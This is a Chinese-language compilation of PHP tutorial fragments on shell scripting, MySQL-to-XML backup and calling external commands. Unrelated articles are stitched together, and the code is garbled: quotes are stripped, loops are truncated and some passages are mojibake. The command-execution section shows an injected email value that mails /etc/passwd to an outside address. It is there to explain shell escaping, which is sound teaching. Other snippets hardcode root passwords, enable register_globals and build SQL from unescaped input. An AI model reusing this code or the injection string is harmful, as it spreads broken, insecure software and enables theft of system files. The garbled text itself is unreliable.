PHP入门

我们都知道，PHP是一种非常好的动态网页开发语言（速度飞快，开发周期短……）。但是只有很少数的人意识到PHP也可以很好的作为编写Shell脚本的语言，当PHP作为编写Shell脚本的语言时，他并没有Perl或者Bash那么强大，但是他却有着很好的优势，特别是对于我这种熟悉PHP但是不怎么熟悉Perl的人。
要使用PHP作为Shell脚本语言，你必须将PHP作为二进制的CGI编译，而不是Apache模式；编译成为二进制CGI模式运行的PHP有一些安全性的问题，关于解决的方法可以参见PHP手册（http://www.php.net）。
一开始你可能会对于编写Shell脚本感到不适应，但是会慢慢好起来的：将PHP作为一般的动态网页编写语言和作为Shell脚本语言的唯一不同就在于一个Shell脚本需要在第一行生命解释本脚本的程序路径：
#!/usr/local/bin/php -q
我们在PHP执行文件后面加入了参数“-1”，这样子PHP就不会输出HTTPHeader（如果仍需要作为Web的动态网页，那么你需要自己使用header函数输出HTTPHeader）。当然，在Shell脚本的里面你还是需要使用PHP的开始和结束标记：

现在让我们看一个例子，以便于更好的了解用PHP作为Shell脚本语言的使用：
#!/usr/local/bin/php -q
print(Hello, world!n);
?>
上面这个程序会简单的输出“Hello, world!”到显示器上。
一、传递Shell脚本运行参数给PHP：
作为一个Shell脚本，经常会在运行程序时候加入一些参数，PHP作为Shell脚本时有一个内嵌的数组“$argv”，使用“$argv”数组可以很方便的读取Shell脚本运行时候的参数（“$argv[1]”对应的是第一个参数，“$argv[2]”对应的是第二个参数，依此类推）。比如下面这个程序：
#!/usr/local/bin/php -q
$first_name = $argv[1];
$last_name = $argv[2];
printf(Hello, %s %s! How are you today?n, $first_name, $last_name);
?>
上面的代码在运行的时候需要两个参数，分别是姓和名，比如这样子运行：
[dbrogdon@artemis dbrogdon]$ scriptname.ph Darrell Brogdon
Shell脚本在显示器上面会输出：
Hello, Darrell Brogdon! How are you today?
[dbrogdon@artemis dbrogdon]$
在PHP 作为动态网页编写语言的时候也含有“$argv”这个数组，不过和这里有一些不同：当PHP作为Shell脚本语言的时候“$argv[0]”对应的是脚本的文件名，而当用于动态网页编写的时候，“$argv[1]”对应的是QueryString的第一个参数。
二、编写一个具有交互式的Shell脚本：
如果一个Shell脚本仅仅是自己运行，失去了交互性，那么也没有什么意思了。当PHP用于Shell脚本的编写的时候，怎么读取用户输入的信息呢？很不幸的是PHP自身没有读取用户输入信息的函数或者方法，但是我们可以效仿其他语言编写一个读取用户输入信息的函数“read”：
function read() {
$fp = fopen(/dev/stdin, r);
$input = fgets($fp, 255);
fclose($fp);
return $input;
}
?>
需要注意的是上面这个函数只能用于Unix系统（其他系统需要作相应的改变）。上面的函数会打开一个文件指针，然后读取一个不超过255字节的行（就是fgets的作用），然后会关闭文件指针，返回读取的信息。
现在我们可以使用函数“read”将我们前面编写的程序1修改一下，使他更加具有“交互性”了：
#!/usr/local/bin/php -q
function read() {
$fp = fopen(/dev/stdin, r);
$input = fgets($fp, 255);
fclose($fp);
return $input;
}
print(What is your first name? );
$first_name = read();
print(What is your last name? );
$last_name = read();
print(nHello, $first_name $last_name! Nice to meet you!n);
?>
将上面的程序保存下来，运行一下，你可能会看到一件预料之外的事情：最后一行的输入变成了三行！这是因为“read”函数返回的信息还包括了用户每一行的结尾换行符“n”，保留到了姓和名中，要去掉结尾的换行符，需要把“read”函数修改一下：
function read() {
$fp = fopen(/dev/stdin, r);
$input = fgets($fp, 255);
fclose($fp);
$input = chop($input); // 去除尾部空白
return $input;
}
?>
三、在其他语言编写的Shell脚本中包含PHP编写的Shell脚本：
有时候我们可能需要在其他语言编写的Shell脚本中包含PHP编写的Shell脚本。其实非常简单，下面是一个简单的例子：
#!/bin/bash
echo This is the Bash section of the code.
/usr/local/bin/php -q << EOF
print(This is the PHP section of the coden);
?>
EOF
其实就是调用PHP来解析下面的代码，然后输出；那么，再试试下面的代码：
#!/bin/bash
echo This is the Bash section of the code.
/usr/local/bin/php -q << EOF
$myVar = PHP;
print(This is the $myVar section of the coden);
?>
EOF
可以看出两次的代码唯一的不同就是第二次使用了一个变量“$myVar”，试试运行，PHP竟然给出出错的信息：“Parse error: parse error in - on line 2”！这是因为Bash中的变量也是“$myVar”，而Bash解析器先将变量给替换掉了，要想解决这个问题，你需要在每个PHP的变量前面加上“” 转义符，那么刚才的代码修改如下：
#!/bin/bash
echo This is the Bash section of the code.
/usr/local/bin/php -q << EOF
$myVar = PHP;
print(This is the $myVar section of the coden);
?>
EOF
好了，现在你可以用PHP编写你自己的Shell脚本了，希望你一切顺利。

在PHP4.2以后的版本中register_global默认为off
若想取得从另一页面提交的变量:
方法一:在PHP.ini中找到register_global，并把它设置为on.
方法二:在接收网页最前面放上这个extract($_POST);extract($_GET);(注意extract($_SESSION)前必须要有Session_Start()).
方法三:一个一个读取变量$a=$_GET["a"];$b=$_POST["b"]等，这种方法虽然麻烦，但比较安全.

以下是在Linux下通过Apache+PHP对Mysql数据库的备份的文件代码： 
文件一、Listtable.php （文件列出数据库中的所有表格，供选择备份） 
请选择要备份的表格: 
$con=mysql_connect(localhost,root,xswlily); 
$lists=mysql_list_tables(embed,$con); 
//数据库连接代码 
$i=0; 
while($i$tb_name=mysql_tablename($lists,$i); 
echo .$tb_name. 
; 
//列出所有的表格 
$i++;} 
?> 
文件二、Backup.php 
) header(Location:listtable.php);?>
$con=mysql_connect(localhost,root,xswlily); 
$query=select * from $table ; 
//数据库查询 
$result=mysql_db_query(embed,$query,$con); 
$filestr=<.?xml version=1.0 encoding=GB2312?.>; 
$filestr.=<.$table.s>; 
while ($row=mysql_fetch_array($result)) 
//列出所有的记录 
{$filestr.=<.$table.>; 
$fields=mysql_list_fields(embed,$table,$con); 
$j=0; 
//$num_fields=mysql_field_name($fields,$j); 
//echo $num_fields; 
while ($j$num_fields=mysql_field_name($fields,$j); 
$filestr.=<.$num_fields.>; 
$filestr.=$row[$j]; 
$filestr.=; 
$j++;} 
$filestr.=; 
} 
$filestr.=; 
echo $filestr; 
//以下是文件操作代码 
$filename=$table..xml; 
$fp=fopen($filename,w); 
fwrite($fp,$filestr); 
fclose($fp); 
Echo 数据表.$table.已经备份成功！;?> 
通过以上文件的操作就可以实现对数据库中选定的表格进行备份. 
以上主要介绍了通过PHP实现XML备份数据库的操作方法，其实并不复杂，通过XML，我们可以备份各种各样的数据库，当然也可以通过相关的方法将备份的XML文档恢复到数据库中。

PHP中对各类数据库的操作有着支持，对文件的操作也同样有着很丰富的操作方法，很多朋友现在的操作还是基于文件操作可是有的时候在操作文件的时候还存在不少的困惑和疑点，以下是我在日常编写过程中碰到的以及坛上朋友所碰到的关于文件操作的一些问题收藏吧。

看了FonTomas的用Editplus实现J2SDK的可视化编程(参见http://www.csdn.net/Develop/article/15/15416.shtm)一文后，笔者做为一个PHP程序员，萌发出了让Editplus调试PHP程序的想法。经过我的测试与N次的试验之后，终于可以让Editplus完美的实现这个功能了。具体实现方法如下:

提出问题

前几天做了一个非常奇怪的项目，我公司开发了一套基于中国联通SGIP协议的SP端短消息服务软件，提供联通130短信服务。这套系统是Windows 2000下的，数据库采用的是微软SQLServer2000，并且已经正常运行了一段时间。而最近由于要在WEB上提供短消息用户的一些信息，就需要从WEB上读写SQLServer数据库，本来SQLServer数据库的最佳搭档应该是微软IIS ASP服务端脚本，但我公司一向认为IIS+ASP的稳定性和安全性都不尽如意，希望能够在Linux下用PHP脚本读写SQLServer。

PHP作为一种服务器端的脚本语言，象编写简单，或者是复杂的动态网页这样的任务，它完全能够胜任。但事情不总是如此，有时为了实现某个功能，必须借助于操作系统的外部程序（或者称之为命令），这样可以做到事半功倍。
那么，是否可以在PHP脚本中调用外部命令呢？如果能，如何去做呢？有些什么方面的顾虑呢？相信你看了本文后，肯定能够回答这些问题了。
是否可以？
答案是肯定的。PHP和其它的程序设计语言一样，完全可以在程序内调用外部命令，并且是很简单的：只要用一个或几个函数即可。
前提条件
由于PHP基本是用于WEB程序开发的，所以安全性成了人们考虑的一个重要方面。于是PHP的设计者们给PHP加了一个门：安全模式。如果运行在安全模式下，那么PHP脚本中将受到如下四个方面的限制：
执行外部命令
在打开文件时有些限制
连接MySQL数据库
基于HTTP的认证
在安全模式下，只有在特定目录中的外部程序才可以被执行，对其它程序的调用将被拒绝。这个目录可以在php.ini文件中用safe_mode_exec_dir指令，或在编译PHP是加上--with-exec-dir选项来指定，默认是/usr/local/php/bin。
如果你调用一个应该可以输出结果的外部命令（意思是PHP脚本没有错误），得到的却是一片空白，那么很可能你的网管已经把PHP运行在安全模式下了。
如何做？
在PHP中调用外部命令，可以用如下三种方法来实现：
1） 用PHP提供的专门函数
PHP提供共了3个专门的执行外部命令的函数：system()，exec()，passthru()。
system()
原型：string system (string command [, int return_var])
system()函数很其它语言中的差不多，它执行给定的命令，输出和返回结果。第二个参数是可选的，用来得到命令执行后的状态码。
例子：
system(/usr/local/bin/webalizer/webalizer);
?>
exec()
原型：string exec (string command [, string array [, int return_var]])
exec()函数与system()类似，也执行给定的命令，但不输出结果，而是返回结果的最后一行。虽然它只返回命令结果的最后一行，但用第二个参数array可以得到完整的结果，方法是把结果逐行追加到array的结尾处。所以如果array不是空的，在调用之前最好用unset()最它清掉。只有指定了第二个参数时，才可以用第三个参数，用来取得命令执行的状态码。
例子：
exec(/bin/ls -l);
exec(/bin/ls -l, $res);
exec(/bin/ls -l, $res, $rc);
?>
passthru()
原型：void passthru (string command [, int return_var])
passthru()只调用命令，不返回任何结果，但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmplus（Unix下的一个处理图片的工具，输出二进制的原始图片的流）这样的程序。同样它也可以得到命令执行的状态码。
例子：
header(Content-type: image/gif);
passthru(./ppmtogif hunte.ppm);
?>
2） 用popen()函数打开进程
上面的方法只能简单地执行命令，却不能与命令交互。但有些时候必须向命令输入一些东西，如在增加Linux的系统用户时，要调用su来把当前用户换到root才行，而su命令必须要在命令行上输入root的密码。这种情况下，用上面提到的方法显然是不行的。
popen()函数打开一个进程管道来执行给定的命令，返回一个文件句柄?lt;热环祷氐氖且桓鑫募句柄，那么就可以对它读和写了。在PHP3中，对这种句柄只能做单一的操作模式，要么写，要么读；从PHP4开始，可以同时读和写了。除非这个句柄是以一种模式（读或写）打开的，否则必须调用pclose()函数来关闭它。
例子1：
$fp=popen(/bin/ls -l, r);
?>
例子2（本例来自PHP中国联盟网站http://www.phpx.com/show.php?d=col&i=51）：
/* PHP中如何增加一个系统用户
下面是一段例程，增加一个名字为james的用户,
root密码是 verygood。仅供参考
*/
$sucommand = su --login root --command;
$useradd = useradd ;
$rootpasswd = verygood;
$user = james;
$user_add = sprintf(%s %s %s,$sucommand,$useradd,$user);
$fp = @popen($user_add,w);
@fputs($fp,$rootpasswd);
@pclose($fp);
?>
3） 用反撇号（`，也就是键盘上ESC键下面的那个，和~在同一个上面）
这个方法以前没有归入PHP的文档，是作为一个秘技存在的。方法很简单，用两个反撇号把要执行的命令括起来作为一个表达式，这个表达式的值就是命令执行的结果。如：
$res=/bin/ls -l;
echo
.$res.
;
?>
这个脚本的输出就象：
hunte.gif
hunte.ppm
jpg.htm
jpg.jpg
passthru.php
要考虑些什么？
要考虑两个问题：安全性和超时。
先看安全性。比如，你有一家小型的网上商店，所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件，让你的用户输入他们的EMAIL地址，然后把这个产品列表发给他们?lt;偕枘忝挥惺褂肞HP的mail()函数（或者从未听说过），你就调用Linux/Unix系统的mail程序来发送这个文件。程序就象这样：
system(mail $to < products.txt);
echo 我们的产品目录已经发送到你的信箱：$to;
?>
用这段代码，一般的用户不会产生什么危险，但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址：
--bla ; mail someone@domain.com < /etc/passwd ;
那么这条命令最终变成：
mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt
我相信，无论哪个网络管理人员见到这样的命令，都会吓出一身冷汗来。
幸好，PHP为我们提供了两个函数：EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的，象分号（），重定向（>）和从文件读入（<）等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号，并把字符串中的单引号转义，这样这个字符串就可以安全地作为命令的参数。
再来看看超时问题。如果要执行的命令要花费很长的时间，那么应该把这个命令放到系统的后台去运行。但在默认情况下，象system()等函数要等到这个命令运行完才返回（实际上是要等命令的输出结果），这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中，如：
system(/usr/local/bin/order_proc > /tmp/null &);
?>

在新下载的PHP5中你会发现多了一个mysqli.dll，它是干什么用的呢？我简单介绍下：
mysqli.dll是PHP对mysql新特性的一个扩展支持。在PHP5中可以在php.ini中加载，如下图：

到满多网站都有即时简繁切换的功能,只是都不见有人提供做法,因 此我也写了一段转换程式,给有需要的人参考:
以下程式所用的table档是a4chinese的big5-gb.table,其版权为a4chinese作者所有;PHP程式码部分则可自由修改应用,唯不得出售营利..^^

如果一个表单中有多个同名复选框，在提交到php时却只有一个值，而并不像asp那样是一串用逗号分割的值。有一个很简单的方法来解决：将复选框的name后面加上[]，例如：checkbox value=1 /> 改为：。这样php将得到一个叫ccc的阵列。但这种方法有个问题，如果您要在客户端对复选框是否被选择、选择了几个用javascript来判断时，javascript会因为复选框的name中含有[]而出错。您可以在表单中加入一个隐含域，用javascript设置它的值。

OCIDefineByName
让 SELECT 指令可使用 PHP 变数。
语法: boolean OCIDefineByName(int stmt, string ColumnName, mixed &variable, int [type]);
传回值: 布林值
函式种类: 资料库功能

PHP4.0 提供了一个输出缓冲函数集合。输出缓冲支持允许你写包裹函数功能压缩缓冲区。在 PHP4 的输出缓冲支持允许 HTML 头信息存放, 无论 HTML的正文是否输出。但在PHP中，头信息( (header(), content type, and cookies )不采用缓冲 。
在使用PHP的过程中不免要使用到header和